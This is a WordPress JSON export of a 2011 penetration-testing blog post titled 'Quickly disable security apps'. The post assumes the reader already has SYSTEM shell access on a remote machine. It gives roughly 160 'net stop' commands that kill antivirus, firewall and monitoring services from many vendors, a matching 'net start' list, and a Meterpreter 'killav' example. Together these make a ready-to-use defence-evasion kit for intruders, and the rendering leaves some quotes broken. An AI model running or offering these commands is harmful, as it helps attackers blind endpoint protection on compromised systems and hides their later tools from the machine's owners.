{"id":318,"date":"2011-12-20T13:06:09","date_gmt":"2011-12-20T12:06:09","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=318"},"modified":"2011-12-20T13:48:49","modified_gmt":"2011-12-20T12:48:50","slug":"quickly-disable-security-apps","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/20\/quickly-disable-security-apps\/","title":{"rendered":"Quickly disable security apps"},"content":{"rendered":"

So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.<\/p>\n

Here’s a quick list of services to kill:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
<\/div><\/td>
net stop "Ahnlab Task Scheduler"<\/span>
\nnet stop "altiris client service"<\/span>
\nnet stop ANTIVIR
\nnet stop ATRACK
\nnet stop "avast! antivirus"<\/span>
\nnet stop "avast! iavs4 control service"<\/span>
\nnet stop AVCONSOL
\nnet stop "AVG6 Service"<\/span>
\nnet stop "AVG7 Alert Manager Server"<\/span>
\nnet stop "AVG7 Update Service"<\/span>
\nnet stop AVP32
\nnet stop "AVP control center service"<\/span>
\nnet stop AVP.EXE  
\nnet stop "AVSync Manager"<\/span>
\nnet stop AVSYNMGR
\nnet stop "Background Intelligent Transfer Service"<\/span>
\nnet stop "BlackICE"<\/span>
\nnet stop "carbon copy access edition"<\/span>
\nnet stop CFINET
\nnet stop CFINET32
\nnet stop "config loader"<\/span>
\nnet stop "DefWatch"<\/span>
\nnet stop "Detector de OfficeScanNT"<\/span>
\nnet stop "directupdate engine"<\/span>
\nnet stop "dllhost"<\/span>
\nnet stop "dns"<\/span>
\nnet stop "etrust antivirus job server"<\/span>
\nnet stop "eTrust Antivirus Job Server"<\/span>
\nnet stop "etrust antivirus realtime server"<\/span>
\nnet stop "eTrust Antivirus Realtime Server"<\/span>
\nnet stop "etrust antivirus rpc server"<\/span>
\nnet stop "eTrust Antivirus RPC Server"<\/span>
\nnet stop "Eventask"<\/span>
\nnet stop "FireBall"<\/span>
\nnet stop "FireBaum"<\/span>
\nnet stop "fix-it task manager"<\/span>
\nnet stop F-PROT95
\nnet stop FP-WIN
\nnet stop F-STOPW
\nnet stop "fxsvc"<\/span>
\nnet stop "gear security"<\/span>
\nnet stop IAMAPP
\nnet stop ICMON
\nnet stop "intel file transfer"<\/span>
\nnet stop "intel pds"<\/span>
\nnet stop "Internet Connection Firewall (ICF) \/ Internet Connection Sharing (ICS)"<\/span>
\nnet stop "InternetFirewallProc"<\/span>
\nnet stop "internet pr0tocol"<\/span>
\nnet stop IOMON98
\nnet stop "iroff"<\/span>
\nnet stop "KAV Moniter Service"<\/span>
\nnet stop "kerio personal firewall"<\/span>
\nnet stop "Kingsoft AntiVirus Service"<\/span>
\nnet stop LOCKDOWN2000
\nnet stop LUALL
\nnet stop LUCOMSERVER
\nnet stop "MastDLL"<\/span>
\nnet stop MCAFEE
\nnet stop "McAfee Agent"<\/span>
\nnet stop "McAfee.com McShield"<\/span>
\nnet stop "McAfee.com VirusScan Online Realtime Engine"<\/span>
\nnet stop "mcafee framework service"<\/span>
\nnet stop "mcshield"<\/span>
\nnet stop "McShield"<\/span>
\nnet stop "MonSvcNT"<\/span>
\nnet stop msclol2
\nnet stop "msclol2"<\/span>
\nnet stop msclol8
\nnet stop "msclol8"<\/span>
\nnet stop msinit
\nnet stop "MsInt"<\/span>
\nnet stop "MsIntScan"<\/span>
\nnet stop "NAV Alert"<\/span>
\nnet stop NAVAPSVC
\nnet stop NAVAPW32
\nnet stop "NAV Auto-Protect"<\/span>
\nnet stop NAVLU32
\nnet stop NAVRUNR
\nnet stop NAVW32
\nnet stop NAVWNT
\nnet stop NISSERV
\nnet stop NISUM
\nnet stop NMAIN
\nnet stop noipducservice
\nnet stop NORTON
\nnet stop "Norton AntiVirus Auto Protect Service"<\/span>
\nnet stop "Norton AntiVirus Client"<\/span>
\nnet stop "Norton AntiVirus Corporate Edition"<\/span>
\nnet stop "Norton AntiVirus Server"<\/span>
\nnet stop "Norton Internet Security Accounts Manager"<\/span>
\nnet stop "Norton Internet Security Proxy Srvice"<\/span>
\nnet stop "Norton Internet Security service"<\/span>
\nnet stop "Norton Unerase Protection"<\/span>
\nnet stop NVC95
\nnet stop "nvscv"<\/span>
\nnet stop "officescannt listener"<\/span>
\nnet stop "OfficeScanNT Monitor"<\/span>
\nnet stop "officescannt realtime scan"<\/span>
\nnet stop "outpost firewall service"<\/span>
\nnet stop "P2P Networking"<\/span>
\nnet stop "Panda Antivirus"<\/span>
\nnet stop "pcanywhere host service"<\/span>
\nnet stop "PC-cillin Personal Firewall"<\/span>
\nnet stop PCCIOMON
\nnet stop PCCMAIN
\nnet stop PCCWIN98
\nnet stop POP3TRAP
\nnet stop psexesvc
\nnet stop PVIEW95
\nnet stop "Quick Heal Online Protection"<\/span>
\nnet stop "RemoteAgent"<\/span>
\nnet stop "remotely possible\/32"<\/span>
\nnet stop RESCUE32
\nnet stop "rising process communication center"<\/span>
\nnet stop "Rising Process Communication Center"<\/span>
\nnet stop "rising realtime monitor service"<\/span>
\nnet stop "Rising Realtime Monitor Service"<\/span>
\nnet stop "rundll"<\/span>
\nnet stop SAFEWEB
\nnet stop "ScriptBlocking Service"<\/span>
\nnet stop "scvhost"<\/span>
\nnet stop "secur2
\nnet stop "<\/span>Security Center"
\nnet stop "<\/span>services32 service: msinit"
\nnet stop "<\/span>servu"
\nnet stop "<\/span>Serv-U"
\nnet stop "<\/span>serv-u-ftp"
\nnet stop "<\/span>smss"
\nnet stop "<\/span>snake sockproxy service"
\nnet stop "<\/span>Sophos Anti-Virus"
\nnet stop "<\/span>Sophos Anti-Virus Network"
\nnet stop "<\/span>Sygate Personal Firewall"
\nnet stop "<\/span>Sygate Personal Firewall Pro"
\nnet stop "<\/span>SyGateService"
\nnet stop "<\/span>symantec central quarantine"
\nnet stop "<\/span>Symantec Event Manager"
\nnet stop "<\/span>Symantec Proxy Service"
\nnet stop "<\/span>symantec quarantine agent"
\nnet stop "<\/span>symantec quarantine scanner"
\nnet stop SYMPROXYSVC
\nnet stop "<\/span>syslock"
\nnet stop "<\/span>System Event Notification"
\nnet stop "<\/span>systemsecuritydll"
\nnet stop "<\/span>task manager"
\nnet stop "<\/span>Trend Micro Proxy Service"
\nnet stop "<\/span>Trend NT Realtime Service"
\nnet stop "<\/span>V3MonNT"
\nnet stop "<\/span>V3MonSvc"
\nnet stop "<\/span>ViRobot Expert Monitoring"
\nnet stop "<\/span>ViRobot Lite Monitoring"
\nnet stop "<\/span>ViRobot Professional Monitoring"
\nnet stop "<\/span>vnc server"
\nnet stop "<\/span>VNC server"
\nnet stop VSHWIN32
\nnet stop VSSTAT
\nnet stop WEBSCANX
\nnet stop WEBTRAP
\nnet stop win32sl
\nnet stop "<\/span>Windows Firewall"
\nnet stop "<\/span>Windows Internet Connection Sharing(<\/span>ICS)<\/span>"
\nnet stop "<\/span>ZoneAlarm"<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Use with caution as it’s not as easy to start them all up again, maybe this would help?:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
<\/div><\/td>
net start "Ahnlab Task Scheduler"<\/span>
\nnet start "altiris client service"<\/span>
\nnet start ANTIVIR
\nnet start ATRACK
\nnet start "avast! antivirus"<\/span>
\nnet start "avast! iavs4 control service"<\/span>
\nnet start AVCONSOL
\nnet start "AVG6 Service"<\/span>
\nnet start "AVG7 Alert Manager Server"<\/span>
\nnet start "AVG7 Update Service"<\/span>
\nnet start AVP32
\nnet start "AVP control center service"<\/span>
\nnet start AVP.EXE  
\nnet start "AVSync Manager"<\/span>
\nnet start AVSYNMGR
\nnet start "Background Intelligent Transfer Service"<\/span>
\nnet start "BlackICE"<\/span>
\nnet start "carbon copy access edition"<\/span>
\nnet start CFINET
\nnet start CFINET32
\nnet start "config loader"<\/span>
\nnet start "DefWatch"<\/span>
\nnet start "Detector de OfficeScanNT"<\/span>
\nnet start "directupdate engine"<\/span>
\nnet start "dllhost"<\/span>
\nnet start "dns"<\/span>
\nnet start "etrust antivirus job server"<\/span>
\nnet start "eTrust Antivirus Job Server"<\/span>
\nnet start "etrust antivirus realtime server"<\/span>
\nnet start "eTrust Antivirus Realtime Server"<\/span>
\nnet start "etrust antivirus rpc server"<\/span>
\nnet start "eTrust Antivirus RPC Server"<\/span>
\nnet start "Eventask"<\/span>
\nnet start "FireBall"<\/span>
\nnet start "FireBaum"<\/span>
\nnet start "fix-it task manager"<\/span>
\nnet start F-PROT95
\nnet start FP-WIN
\nnet start F-STOPW
\nnet start "fxsvc"<\/span>
\nnet start "gear security"<\/span>
\nnet start IAMAPP
\nnet start ICMON
\nnet start "intel file transfer"<\/span>
\nnet start "intel pds"<\/span>
\nnet start "Internet Connection Firewall (ICF) \/ Internet Connection Sharing (ICS)"<\/span>
\nnet start "InternetFirewallProc"<\/span>
\nnet start "internet pr0tocol"<\/span>
\nnet start IOMON98
\nnet start "iroff"<\/span>
\nnet start "KAV Moniter Service"<\/span>
\nnet start "kerio personal firewall"<\/span>
\nnet start "Kingsoft AntiVirus Service"<\/span>
\nnet start LOCKDOWN2000
\nnet start LUALL
\nnet start LUCOMSERVER
\nnet start "MastDLL"<\/span>
\nnet start MCAFEE
\nnet start "McAfee Agent"<\/span>
\nnet start "McAfee.com McShield"<\/span>
\nnet start "McAfee.com VirusScan Online Realtime Engine"<\/span>
\nnet start "mcafee framework service"<\/span>
\nnet start "mcshield"<\/span>
\nnet start "McShield"<\/span>
\nnet start "MonSvcNT"<\/span>
\nnet start msclol2
\nnet start "msclol2"<\/span>
\nnet start msclol8
\nnet start "msclol8"<\/span>
\nnet start msinit
\nnet start "MsInt"<\/span>
\nnet start "MsIntScan"<\/span>
\nnet start "NAV Alert"<\/span>
\nnet start NAVAPSVC
\nnet start NAVAPW32
\nnet start "NAV Auto-Protect"<\/span>
\nnet start NAVLU32
\nnet start NAVRUNR
\nnet start NAVW32
\nnet start NAVWNT
\nnet start NISSERV
\nnet start NISUM
\nnet start NMAIN
\nnet start noipducservice
\nnet start NORTON
\nnet start "Norton AntiVirus Auto Protect Service"<\/span>
\nnet start "Norton AntiVirus Client"<\/span>
\nnet start "Norton AntiVirus Corporate Edition"<\/span>
\nnet start "Norton AntiVirus Server"<\/span>
\nnet start "Norton Internet Security Accounts Manager"<\/span>
\nnet start "Norton Internet Security Proxy Srvice"<\/span>
\nnet start "Norton Internet Security service"<\/span>
\nnet start "Norton Unerase Protection"<\/span>
\nnet start NVC95
\nnet start "nvscv"<\/span>
\nnet start "officescannt listener"<\/span>
\nnet start "OfficeScanNT Monitor"<\/span>
\nnet start "officescannt realtime scan"<\/span>
\nnet start "outpost firewall service"<\/span>
\nnet start "P2P Networking"<\/span>
\nnet start "Panda Antivirus"<\/span>
\nnet start "pcanywhere host service"<\/span>
\nnet start "PC-cillin Personal Firewall"<\/span>
\nnet start PCCIOMON
\nnet start PCCMAIN
\nnet start PCCWIN98
\nnet start POP3TRAP
\nnet start psexesvc
\nnet start PVIEW95
\nnet start "Quick Heal Online Protection"<\/span>
\nnet start "RemoteAgent"<\/span>
\nnet start "remotely possible\/32"<\/span>
\nnet start RESCUE32
\nnet start "rising process communication center"<\/span>
\nnet start "Rising Process Communication Center"<\/span>
\nnet start "rising realtime monitor service"<\/span>
\nnet start "Rising Realtime Monitor Service"<\/span>
\nnet start "rundll"<\/span>
\nnet start SAFEWEB
\nnet start "ScriptBlocking Service"<\/span>
\nnet start "scvhost"<\/span>
\nnet start "secur2
\nnet start "<\/span>Security Center"
\nnet start "<\/span>services32 service: msinit"
\nnet start "<\/span>servu"
\nnet start "<\/span>Serv-U"
\nnet start "<\/span>serv-u-ftp"
\nnet start "<\/span>smss"
\nnet start "<\/span>snake sockproxy service"
\nnet start "<\/span>Sophos Anti-Virus"
\nnet start "<\/span>Sophos Anti-Virus Network"
\nnet start "<\/span>Sygate Personal Firewall"
\nnet start "<\/span>Sygate Personal Firewall Pro"
\nnet start "<\/span>SyGateService"
\nnet start "<\/span>symantec central quarantine"
\nnet start "<\/span>Symantec Event Manager"
\nnet start "<\/span>Symantec Proxy Service"
\nnet start "<\/span>symantec quarantine agent"
\nnet start "<\/span>symantec quarantine scanner"
\nnet start SYMPROXYSVC
\nnet start "<\/span>syslock"
\nnet start "<\/span>System Event Notification"
\nnet start "<\/span>systemsecuritydll"
\nnet start "<\/span>task manager"
\nnet start "<\/span>Trend Micro Proxy Service"
\nnet start "<\/span>Trend NT Realtime Service"
\nnet start "<\/span>V3MonNT"
\nnet start "<\/span>V3MonSvc"
\nnet start "<\/span>ViRobot Expert Monitoring"
\nnet start "<\/span>ViRobot Lite Monitoring"
\nnet start "<\/span>ViRobot Professional Monitoring"
\nnet start "<\/span>vnc server"
\nnet start "<\/span>VNC server"
\nnet start VSHWIN32
\nnet start VSSTAT
\nnet start WEBSCANX
\nnet start WEBTRAP
\nnet start win32sl
\nnet start "<\/span>Windows Firewall"
\nnet start "<\/span>Windows Internet Connection Sharing(<\/span>ICS)<\/span>"
\nnet start "<\/span>ZoneAlarm"<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Or the easy way should you have a materpreter session on the remote box:<\/p>\n

1
2
3
<\/div><\/td>
meterpreter ><\/span> run killav
\n[<\/span>*<\/span>]<\/span> Killing Antivirus services on the target...
\nmeterpreter ><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"

So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like. Here’s a quick list of services to kill: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161net stop "Ahnlab Task Scheduler" net stop "altiris client service" net stop ANTIVIR net stop ATRACK net stop "avast! […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[124,126,125,123,122,127],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=318"}],"version-history":[{"count":2,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":320,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318\/revisions\/320"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}